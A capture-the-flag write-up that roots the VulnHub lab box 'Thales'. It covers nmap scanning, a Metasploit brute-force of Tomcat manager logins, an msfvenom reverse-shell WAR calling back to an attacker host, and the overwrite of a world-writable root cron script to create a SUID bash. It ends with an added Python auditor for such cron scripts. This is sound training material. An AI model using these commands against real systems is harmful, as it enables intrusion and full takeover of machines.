192.168.56.134

Port scanning

┌──(mikannse㉿kali)-[~/vulnhub/thales]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 14:04 CST
Nmap scan report for 192.168.56.134
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 08:00:27:33:F9:BE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 21.09 seconds
┌──(mikannse㉿kali)-[~/vulnhub/thales]
└─$ sudo nmap -sT -sC -sV -O -p22,8080 192.168.56.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 14:05 CST
Nmap scan report for 192.168.56.134
Host is up (0.00068s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
| 256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_ 256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open http Apache Tomcat 9.0.52
|_http-title: Apache Tomcat/9.0.52
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:33:F9:BE (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.55 seconds

Tomcat RCE

Brute-force the username and password with msf. It is best not to use other tools such as hydra here, because they disrupt the login service to the point that even the correct credentials no longer get in.

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.56.134
rhosts => 192.168.56.134
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
<SNIP>
[-] 192.168.56.134:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.56.134:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[+] 192.168.56.134:8080 - Login Successful: tomcat:role1

Generate a WAR package to get a reverse shell

┌──(mikannse㉿kali)-[~/vulnhub/thales]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.131 LPORT=443 -f war -o revshell.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes
Saved as: revshell.war

After logging in, upload it under the Deploy section at the bottom of the manager page, start a listener, then visit /revshell to receive the shell.

Privilege escalation

There is a notes.txt on the user's desktop that points to a backup script, and the script is writable by everyone.

tomcat@miletus:/home/thales$ ls -liah /usr/local/bin/backup.sh
ls -liah /usr/local/bin/backup.sh
126 -rwxrwxrwx 1 root root 612 Oct 14 2021 /usr/local/bin/backup.sh

Run pspy and watch for a while; you have to wait roughly 6 or 7 minutes.

tomcat@miletus:/tmp$ ./pspy64
./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
<SNIP>
2024/09/22 07:25:01 CMD: UID=0 PID=1338 | bash /usr/local/bin/backup.sh
2024/09/22 07:25:01 CMD: UID=0 PID=1337 | /bin/sh -c bash /usr/local/bin/backup.sh
2024/09/22 07:25:01 CMD: UID=0 PID=1336 | /usr/sbin/CRON -f
2024/09/22 07:25:01 CMD: UID=0 PID=1339 |
2024/09/22 07:25:01 CMD: UID=0 PID=1340 | hostname -s
2024/09/22 07:25:01 CMD: UID=0 PID=1343 | /bin/sh -c gzip
2024/09/22 07:25:01 CMD: UID=0 PID=1342 | tar czf /var/backups/miletus-Sunday.tgz /opt/tomcat/
2024/09/22 07:25:01 CMD: UID=0 PID=1344 | gzip
2024/09/22 07:25:02 CMD: UID=0 PID=1345 | date
2024/09/22 07:25:02 CMD: UID=0 PID=1346 | ls -lh /var/backups

This shows that a scheduled task is indeed running the script in the background as root.

tomcat@miletus:/tmp$ echo "cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash" >/usr/local/bin/backup.sh

A little while later:

tomcat@miletus:/tmp$ ./root_bash -p
./root_bash -p
root_bash-4.4# whoami
whoami
root
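The root cause here is a root cron job executing a script that anyone can edit. As an added defensive check (not part of the original writeup), this Python script parses system crontab lines for the commands' absolute paths and flags scripts that are world-writable, group-writable by a non-root group, or not owned by root; the crontab text and the temporary file in demo() are constructed, and it assumes a Linux filesystem where chmod is honoured.

```python
import os
import re
import stat
import tempfile

# Constructed sample system crontab (not the target's real crontab);
# the last entry mirrors the backup.sh job seen in the pspy output.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    bash /usr/local/bin/backup.sh
"""

# Five schedule fields, then the user, then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def scripts_from_crontab(text):
    """Yield (user, path) for each absolute path in a system crontab command."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        for tok in m.group("cmd").split():
            if tok.startswith("/") and len(tok) > 1:
                yield m.group("user"), tok


def audit_mode(path, mode, uid, gid, run_as="root"):
    """Pure check on stat data: who besides root could rewrite this script?"""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({stat.filemode(mode)})")
    if mode & stat.S_IWGRP and gid != 0:
        findings.append(f"{path}: writable by non-root group {gid}")
    if run_as == "root" and uid != 0:
        findings.append(f"{path}: owned by uid {uid}, not root")
    return findings


def audit_path(path, run_as="root"):
    """Stat a cron-executed script and return its findings (empty if clean)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing (check the parent directory is not writable)"]
    return audit_mode(path, st.st_mode, st.st_uid, st.st_gid, run_as)


def demo():
    """Constructed scenario: a 0777 cron script, then the same file fixed to 0755."""
    weak = os.path.join(tempfile.mkdtemp(), "backup.sh")
    with open(weak, "w") as f:
        f.write("#!/bin/bash\n# constructed placeholder body\n")
    os.chmod(weak, 0o777)          # the misconfiguration found on the box
    before = audit_path(weak)
    os.chmod(weak, 0o755)          # mitigation: only the owner may modify it
    return before, audit_path(weak)
```

Running the crontab parser against /etc/crontab and /etc/cron.d/* and piping each path into audit_path would have flagged /usr/local/bin/backup.sh before it was abused.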

Afterthoughts

The Tomcat environment tormented me for a long time.